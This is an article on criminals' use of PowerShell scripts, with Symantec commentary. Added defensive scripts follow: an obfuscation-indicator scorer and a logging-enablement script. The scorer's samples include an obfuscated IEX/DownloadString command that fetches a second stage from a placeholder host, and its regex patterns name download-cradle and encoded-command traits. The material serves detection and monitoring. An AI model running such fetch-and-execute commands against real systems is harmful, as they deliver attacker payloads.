PowerShell scripts used to attack businesses
While many system administrators use PowerShell scripts for daily management tasks, researchers have seen attackers increasingly using the framework for their campaigns.
Many recent targeted attacks have used PowerShell scripts, according to Symantec. “The Odinaff group used malicious PowerShell scripts when it attacked financial organisations worldwide,” said Wueest.
“Common cyber criminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry,” he said.
Malicious PowerShell scripts are mainly used as downloaders, much like Office macros, and during the lateral movement phase, where a threat executes code on a remote computer while spreading inside the network, said Wueest.
“Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections,” he said.
Apart from downloading payloads, malicious PowerShell scripts have been used to perform various tasks, such as uninstalling security products, detecting sandboxed environments or sniffing the network for passwords.
The flexibility of the PowerShell language allows scripts to be obfuscated in multiple ways, such as command shortcuts, escape characters or encoding functions, the researchers have found.
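As an added, defender-side illustration (not code from the article or from Symantec), the PowerShell function below scores a captured command line against the kinds of obfuscation and downloader traits described above: encoded commands, escape characters inside tokens, hidden windows, in-memory download helpers. The indicator patterns and the sample command lines are constructed for this example and are not taken from any real incident; the encoded blob is simply the word "Placeholder".

```powershell
# Added example (not from the article or Symantec): score a PowerShell
# command line against common obfuscation/downloader indicators so that
# suspicious invocations can be surfaced from process-creation logs.
# The regexes and sample strings are constructed for illustration.

function Get-PowerShellCommandIndicators {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$CommandLine
    )
    process {
        # Indicator name -> regex. PowerShell's -match is case-insensitive by default.
        $indicators = [ordered]@{
            'EncodedCommand'          = '(^|\s)-(encodedcommand|enco|enc|en|ec|e)\s+[A-Za-z0-9+/=]{20,}'
            'Base64Decode'            = 'FromBase64String'
            'InvokeExpression'        = '\bIEX\b|Invoke-Expression'
            'HiddenWindow'            = '(^|\s)-w(indowstyle)?\s+hidden'
            'NoProfileNonInteractive' = '(^|\s)-(nop|noprofile|noni|noninteractive)\b'
            'BypassExecutionPolicy'   = '(^|\s)-(ep|executionpolicy)\s+bypass'
            'WebDownload'             = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b'
            'CharCodeBuild'           = '\[char\]\s*\d+|-join\s*\('
            'BacktickEscapeInToken'   = '[A-Za-z]`[A-Za-z]'     # e.g. I`EX: escape char splitting a keyword
            'CompressedPayload'       = 'IO\.Compression|DeflateStream|GzipStream'
        }

        # Collect the names of every indicator that matches this command line.
        $hits = [System.Collections.Generic.List[string]]::new()
        foreach ($name in $indicators.Keys) {
            if ($CommandLine -match $indicators[$name]) { $hits.Add($name) }
        }

        [pscustomobject]@{
            CommandLine = $CommandLine
            Indicators  = $hits.ToArray()
            Score       = $hits.Count
            Suspicious  = $hits.Count -ge 2   # assumed threshold; tune to your environment
        }
    }
}

# Constructed sample command lines (not real captures). The base64 string
# decodes to the UTF-16 text "Placeholder".
$samples = @(
    'powershell.exe Get-Service -Name Spooler | Restart-Service',
    'powershell.exe -nop -w hidden -ep bypass -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA==',
    'powershell.exe -noni -c "I`EX (New-Object Net.WebClient).DownloadString(''http://example.invalid/stage2'')"'
)

# First line scores 0; the second hits four indicators; the third hits three
# (the backtick escape hides IEX from the plain keyword match, which is why
# the escape-character indicator exists).
$samples | Get-PowerShellCommandIndicators |
    Format-Table Score, Suspicious, Indicators, CommandLine -AutoSize
```

In practice the input would come from process-creation telemetry (for example, the command-line field of Sysmon or Windows Security process events) rather than a hard-coded array, and the threshold and pattern list would be tuned against the administrative scripts that are normal in the environment.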
Symantec expects more PowerShell threats to appear in the future. “We strongly recommend system administrators to upgrade to the latest version of PowerShell and enable extended logging and monitoring capabilities,” said Wueest.
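The recommendation to upgrade and enable extended logging can be acted on with the script below, added here as an example rather than anything published with the article or by Symantec. It reports the installed PowerShell version, writes the local policy registry values that correspond to the Script Block Logging, Module Logging and Transcription Group Policy settings (script block logging requires PowerShell 5.0 or later), and then reads back recent script block events (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The transcript output directory is an assumption; run it from an elevated session, and keep `-WhatIf` until the registry changes have been reviewed.

```powershell
# Added example (not from the article or Symantec): audit the PowerShell
# version, enable script block / module / transcription logging via the
# policy registry keys, and query recent script block events.
# Requires an elevated session. The transcript directory is an assumed value.

function Get-PowerShellVersionInfo {
    [pscustomobject]@{
        Version                     = $PSVersionTable.PSVersion
        ScriptBlockLoggingSupported = $PSVersionTable.PSVersion.Major -ge 5
    }
}

function Enable-PowerShellAuditLogging {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string]$TranscriptDirectory = 'C:\PSTranscripts'   # assumed location; use a protected share in production
    )
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    # Each entry mirrors one Group Policy setting under
    # Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell.
    $settings = @(
        @{ Key = "$base\ScriptBlockLogging";       Name = 'EnableScriptBlockLogging'; Value = 1;                    Type = 'DWord'  }
        @{ Key = "$base\ModuleLogging";            Name = 'EnableModuleLogging';      Value = 1;                    Type = 'DWord'  }
        @{ Key = "$base\ModuleLogging\ModuleNames"; Name = '*';                       Value = '*';                  Type = 'String' }  # log all modules
        @{ Key = "$base\Transcription";            Name = 'EnableTranscripting';      Value = 1;                    Type = 'DWord'  }
        @{ Key = "$base\Transcription";            Name = 'EnableInvocationHeader';   Value = 1;                    Type = 'DWord'  }
        @{ Key = "$base\Transcription";            Name = 'OutputDirectory';          Value = $TranscriptDirectory; Type = 'String' }
    )
    foreach ($s in $settings) {
        if ($PSCmdlet.ShouldProcess("$($s.Key)\$($s.Name)", "Set to '$($s.Value)'")) {
            if (-not (Test-Path -Path $s.Key)) { New-Item -Path $s.Key -Force | Out-Null }
            New-ItemProperty -Path $s.Key -Name $s.Name -Value $s.Value -PropertyType $s.Type -Force | Out-Null
        }
    }
}

function Get-RecentScriptBlockEvents {
    param([int]$Hours = 24, [int]$MaxEvents = 200)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104                      # script block logging: "Creating Scriptblock text"
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # SilentlyContinue so an empty log (nothing logged yet) does not raise an error.
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Time   = $_.TimeCreated
                User   = $_.UserId
                Script = $_.Message
            }
        }
}

Get-PowerShellVersionInfo
Enable-PowerShellAuditLogging -WhatIf            # drop -WhatIf to apply the settings
Get-RecentScriptBlockEvents -Hours 24 | Select-Object -First 5 | Format-List
```

Forwarding the Microsoft-Windows-PowerShell/Operational log to a central collector matters as much as enabling it: a script that uninstalls security products or runs during lateral movement will often try to cover its tracks on the host, and the 4104 events that recorded the decoded script block are the evidence an analyst needs.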